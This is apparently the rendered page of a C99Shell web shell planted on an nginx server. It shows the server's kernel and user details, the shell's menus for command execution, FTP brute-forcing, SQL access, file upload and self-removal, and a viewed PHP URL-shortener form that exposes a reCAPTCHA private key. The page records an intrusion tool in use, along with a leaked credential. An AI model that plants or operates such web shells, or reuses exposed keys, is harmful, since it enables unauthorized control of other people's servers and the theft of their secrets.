!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phurl/html/   drwxrwxr-x
Free 83.3 GB of 96.73 GB (86.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index_form.php (1.97 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if( !defined('PHURL' ) ) {
    
header('HTTP/1.0 404 Not Found');
    exit();
}
ini_set('display_errors'0);
    require_once(
'recaptchalib.php');
    
$publickey "6Lc7YwsTAAAAAIfDdIXnuqUWoN9TnojDojmOGoMr";
    
$privatekey "6Lc7YwsTAAAAAOMqS3heS3gkkyOzcAqs9aAJcceP";
    
$resp null;



if (
$lenguaje=get_languages("header")=="es"){
 
$Atrad=array(
"Create a short URL"=>"Acorta una URL",
"Enter web address (URL) here:"=>"Introduzca la URL aqui:"
"Custom alias (optional):"=>"Alias que desea (opcional):",  
"May contain letters, numbers, dashes and underscores."=>"Solo puede tener numeros, letras y los simbolos '-' y '_'",
"Shorten"=>"Acortar"      
);
}else{
    
$Atrad=array(
"Create a short URL"=>"Create a short URL",
"Enter web address (URL) here:"=>"Enter web address (URL) here:",
"Custom alias (optional):"=>"Custom alias (optional):",
"May contain letters, numbers, dashes and underscores."=>"May contain letters, numbers, dashes and underscores.",
"Shorten"=>"Shorten"
);

}

 



echo 
"<h2>".$Atrad["Create a short URL"]."</h2>";
print_errors() ?>
<div id="create_form">
<form method="post" action="index.php">
<p><?echo recaptcha_get_html($publickey);?></p> 
<p><label for="url"><? echo $Atrad["Enter web address (URL) here:"];?></label><br />
<input id="url" type="text" name="url" value="<?php echo htmlentities(@$_GET['url']) ?>" />
<input class="button" type="submit" value="<? echo $Atrad["Shorten"];?>" /></p>
<p><label for="alias"><? echo $Atrad["Custom alias (optional):"];?></label><br />
<?php echo SITE_URL ?>/<input id="alias" maxlength="40" type="text" name="alias" value="<?php echo htmlentities(@$_GET['alias']) ?>" /><br />
<em><? echo $Atrad["May contain letters, numbers, dashes and underscores."];?></em></p>

<input type="hidden" name="usuario" value="fargsa" />
</form>
</div>
<script type="text/javascript">
//<![CDATA[
if (document.getElementById) {
    document.getElementById('url').focus();
}
//]]>
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0031 ]--